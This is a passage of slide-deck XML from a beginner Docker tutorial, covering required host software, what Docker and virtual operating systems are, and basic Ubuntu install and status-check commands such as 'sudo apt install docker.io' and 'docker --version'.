              <a:t>What are application/softwares that are need to install in our host OS ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942" name="Google Shape;942;p164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926075" y="2447975"/>
            <a:ext cx="4428600" cy="1643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3"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Visual Studio Code editor</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GIT SCM is also a software</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Chrome</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VirtualBox/VMWare</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker is Software</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="163650"/>
            <a:ext cx="8520600" cy="139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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="948" name="Google Shape;948;p165"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2246125" y="1355275"/>
            <a:ext cx="5232768" cy="367929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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="635100"/>
            <a:ext cx="8520600" cy="3873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2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Docker uses OS-level virtualization to deliver software in packages called containers. </a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The service has both free and premium tiers.</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The software that hosts the containers is called Docker Engine. </a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>It was first started in 2013 and is developed by Docker</a:t>
            </a:r>
            <a:endParaRPr sz="6800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7445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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/W Requirements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Google Shape;959;p167"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1722325"/>
            <a:ext cx="8355300" cy="2721300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>WSL = Windows SubSystem Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://wslstorestorage.blob.core.windows.net/wslblob/wsl_update_x64.msi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="161616"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="697350"/>
            <a:ext cx="8520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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sorry My H/W </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> support docker?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="965" name="Google Shape;965;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2234550"/>
            <a:ext cx="8520600" cy="2796000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> worry, Still you can learn docker online on playground</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://labs.play-with-docker.com/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="851300"/>
            <a:ext cx="8520600" cy="73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You can practice docker</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="971" name="Google Shape;971;p169"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3406325" y="1903750"/>
            <a:ext cx="3414600" cy="1846200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-527050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4700"/>
              <a:t>Online</a:t>
            </a:r>
            <a:endParaRPr sz="4700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-527050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4700"/>
              <a:t>Offline</a:t>
            </a:r>
            <a:endParaRPr sz="47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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="851300"/>
            <a:ext cx="8520600" cy="73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Install docker on ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="977" name="Google Shape;977;p170"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697350" y="1903750"/>
            <a:ext cx="8049600" cy="184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700"/>
              <a:t>sudo apt install docker.io -y</a:t>
            </a:r>
            <a:endParaRPr sz="4700"/>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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="851300"/>
            <a:ext cx="8520600" cy="73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Check docker version</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983" name="Google Shape;983;p171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697350" y="1903750"/>
            <a:ext cx="8049600" cy="184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700"/>
              <a:t>docker --version</a:t>
            </a:r>
            <a:endParaRPr sz="47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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="851300"/>
            <a:ext cx="8520600" cy="73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880">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install docker compose on ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3880">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Google Shape;989;p172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697350" y="1903750"/>
            <a:ext cx="8049600" cy="184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700"/>
              <a:t>sudo apt install docker-compose -y</a:t>
            </a:r>
            <a:endParaRPr sz="47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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="851300"/>
            <a:ext cx="8520600" cy="73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Check docker version</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995" name="Google Shape;995;p173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697350" y="1903750"/>
            <a:ext cx="8049600" cy="1846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700"/>
              <a:t>docker --version</a:t>
            </a:r>
            <a:endParaRPr sz="4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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396425" y="296775"/>
            <a:ext cx="8520600" cy="139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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465275" y="2043875"/>
            <a:ext cx="8451900" cy="15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rgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating system create a virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  on your host machine</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1130575"/>
            <a:ext cx="8520600" cy="1394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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check if docker is running in the linux</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001" name="Google Shape;1001;p174"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="26055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300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl status docker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397075" y="234775"/>
            <a:ext cx="8520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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check if docker is installed?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1007" name="Google Shape;1007;p175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578500" y="2149175"/>
            <a:ext cx="8520600" cy="2881200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-380841" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2398"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Check with GUI interface (Not </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>recommended</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-380841" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2398"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Check with Command Line (CMD)(R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ecommended</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
